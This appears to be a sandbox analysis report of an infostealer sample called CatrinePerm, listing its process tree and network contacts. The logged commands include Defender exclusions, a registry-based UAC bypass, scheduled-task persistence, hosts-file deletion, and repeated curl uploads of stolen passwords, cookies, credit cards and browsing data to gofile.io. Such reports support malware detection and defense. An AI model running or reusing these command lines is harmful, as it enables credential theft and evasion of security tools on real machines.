| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Gk67Vl.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe773146f8,0x7ffe77314708,0x7ffe77314718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1792 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4632 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap2958:84:7zEvent12321
C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe
"C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe"
C:\Users\Admin\AppData\Roaming\Win (3).exe
"C:\Users\Admin\AppData\Roaming\Win (3).exe"
C:\Users\Admin\AppData\Roaming\CatrinePerm.exe
"C:\Users\Admin\AppData\Roaming\CatrinePerm.exe"
C:\Users\Admin\AppData\Local\Temp\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"
C:\Users\Admin\AppData\Local\Temp\pythonw.exe
"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"
C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe
"C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe"
C:\Users\Admin\AppData\Local\Temp\pythonw.exe
"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WinRAR.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WinRAR.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Update.exe'
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\browseconsole166.vbs" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C computerdefaults.exe
C:\Windows\SysWOW64\ComputerDefaults.exe
computerdefaults.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN JavaAutoUpdateTask_tmDyfmMXN8Sx8SfXBvvH040MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\tmDyfmMXN8Sx8SfXBvvH040MX.exe" /RL HIGHEST /IT
C:\Windows\SysWOW64\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\browseconsole166.vbs
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC ONLOGON /TN JavaAutoUpdateTask_tmDyfmMXN8Sx8SfXBvvH040MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\tmDyfmMXN8Sx8SfXBvvH040MX.exe" /RL HIGHEST /IT
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile
C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe
"C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Roaming\Update.exe"
C:\Users\Admin\AppData\Roaming\Win (3).exe
"C:\Users\Admin\AppData\Roaming\Win (3).exe"
C:\Users\Admin\AppData\Roaming\CatrinePerm.exe
"C:\Users\Admin\AppData\Roaming\CatrinePerm.exe"
C:\Users\Admin\AppData\Local\Temp\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"
C:\Users\Admin\AppData\Local\Temp\pythonw.exe
"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"
C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe
"C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile
C:\Users\Admin\AppData\Local\Temp\pythonw.exe
"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\browseconsole166.vbs
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store1.gofile.io/uploadFile
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store1.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store1.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store1.gofile.io/uploadFile
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3088 /prefetch:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store1.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store1.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store1.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store1.gofile.io/uploadFile
C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe
"C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe" Taskmgr.exe
C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe
"C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe" explorer.exe
C:\Users\Admin\AppData\Roaming\Update.exe
C:\Users\Admin\AppData\Roaming\Update.exe
C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe
"C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe"
C:\Users\Admin\AppData\Roaming\Win (3).exe
"C:\Users\Admin\AppData\Roaming\Win (3).exe"
C:\Users\Admin\AppData\Roaming\CatrinePerm.exe
"C:\Users\Admin\AppData\Roaming\CatrinePerm.exe"
C:\Users\Admin\AppData\Local\Temp\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"
C:\Users\Admin\AppData\Local\Temp\pythonw.exe
"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"
C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe
"C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe"
C:\Users\Admin\AppData\Local\Temp\pythonw.exe
"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store10.gofile.io/uploadFile
C:\Users\Admin\AppData\Roaming\Update.exe
C:\Users\Admin\AppData\Roaming\Update.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| GB | 92.123.128.133:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 51.178.66.33:443 | gofile.io | tcp |
| FR | 51.178.66.33:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | 33.66.178.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.29.80.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.242.75.51.in-addr.arpa | udp |
